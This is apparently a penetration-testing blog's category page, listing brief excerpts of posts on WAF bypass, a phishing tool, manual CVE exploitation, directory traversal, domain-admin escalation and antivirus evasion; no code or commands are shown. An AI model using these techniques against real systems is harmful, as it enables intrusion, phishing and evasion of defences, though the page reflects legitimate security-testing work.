Category: Penetration Testing
-
Automate WAF Bypass with Burp
I read an article from a Fortify security researcher earlier this week that provided a very simple and effective way to bypass some Web Application Firewalls (WAFs). The article can be found here. After reading, I updated my Burp configuration to automatically take advantage of this flaw in design and thought I would share the…
-
Gophishing Update – Enhanced Clickthrough and More
I’ve released a new version of Gophish.py. The update includes: Fixed a bug in rewriting the method attribute in phished forms Fixed a bug with GET based forms Fixed a bug in the autofill option, fixed the demo/sample file accordingly Fixed a bug where links were rewritten when using ‘javascript:…’ Fixed some bugs regarding correctly…
-
Manually Penetrating the Ektron Vulnerability – CVE-2012-5357
My posts are a little bit out of order here in that this was one of the first vulnerabilities that I came across in which the Metasploit modules failed due to a combination of DEP and AV. The result was researching AV bypass techniques that I began discussing here, and then here, and then figuring…
Josh Berry
-
GoPhishing Update – Clickthrough and Redirection Support
I’ve released a new version of Gophish.py. The update includes: Added comments explaining my ugly code. cleaned up some code with a function, removing some redundancy. Some bug fixes. The main fix is for an issue I found in certain cases when running it on Linux. Sometimes BeautifulSoup would change the order of the HTML…
-
Directory Traversal to Root
I’ve had some success in the past when finding directory traversal vulnerabilities on Linux/Unix hosts and thought I would share a little post on what I’ve found. The vulnerabilities are often found in the unauthenticated portions (convenient) of management applications such as Webmin or ColdFusion and are frequently running with elevated privileges. The first step…
Josh Berry
-
Follow Up on SYSTEM to Domain Admin Post
I learned a few new things and made a few updates to my script after the last post that I thought I would share. First things first, someone commented on the article on another site and mentioned that the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain provides the same functionality over SMB by calling the Windows NetWkstaUserEnum function. Example…
-
SYSTEM to Domain Admin – Technique One
Today I am going to give a quick overview of one of my favorite ways to escalate from SYSTEM level privileges on a single host, to domain admin level and more on a Windows network. There are many ways and techniques to accomplish jumping from SYSTEM to domain admin, this just happens to be one…
Josh Berry
-
Manually Penetrating the FCKedit Vulnerability – CVE-2009-2265
I am seeing more and more scenarios where for whatever reason, the Metasploit modules, and modules from commercial solutions I use, aren’t successful against a known vulnerable host. This is often due to DEP or antivirus protections that I discussed here and again here. There can also be other security mechanisms at play from time…
Josh Berry
-
CodeWatch Update – 12/4/2013
This weekend I made the first updates to CodeWatch since releasing it as a free service and am just now getting around to posting a notification. The updates included: Minor bugfixes throughout the system. Upgrades to the Brakeman scanner for Ruby on Rails vulnerability testing. We were using an outdated version but are now (at…
-
Follow Up on DEP and AV Bypass
This is a continuation of research based on my adventures on a penetration testing engagement described here. There were a few key features that I really wanted to add to enhance my DEP/AV bypass tool: Bypass a majority of AV systems Remove the dependency on the msvcr100d.dll file Combine the Metasploit payload in the shellcodeexec…
CodeWatch 